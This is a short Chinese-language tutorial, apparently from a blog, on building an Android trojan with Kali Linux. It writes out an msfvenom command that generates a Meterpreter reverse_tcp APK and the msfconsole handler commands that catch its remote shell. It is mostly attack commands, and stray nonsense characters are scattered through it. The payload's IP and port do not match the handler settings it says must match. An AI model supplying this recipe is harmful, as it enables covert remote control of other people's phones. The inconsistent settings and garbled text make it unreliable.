滲透機(jī):kali2017.3
靶機(jī):自己本人的安卓手機(jī)一部
首先我們需要生成一個(gè)安卓木馬
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk
LHOST 本地的IP地址
LPORT 反向連接到主機(jī)的端口
R> 木馬生成的保存輸出路徑
至于木馬的免殺暫且不談存筏。
然后打開msfconsole
設(shè)置模塊
use exploit/multi/handler
設(shè)置payload為反向tcp連接
set payload android/meterpreter/reverse_tcp
設(shè)置本地的IP地址
set lhost 192.168.11.118
設(shè)置端口镀虐,跟前面生成木馬連接的端口號(hào)要對(duì)應(yīng)一樣
set lport 4444
show options查看參數(shù)
然后執(zhí)行
下面是我從網(wǎng)上找的一些參數(shù)的釋義。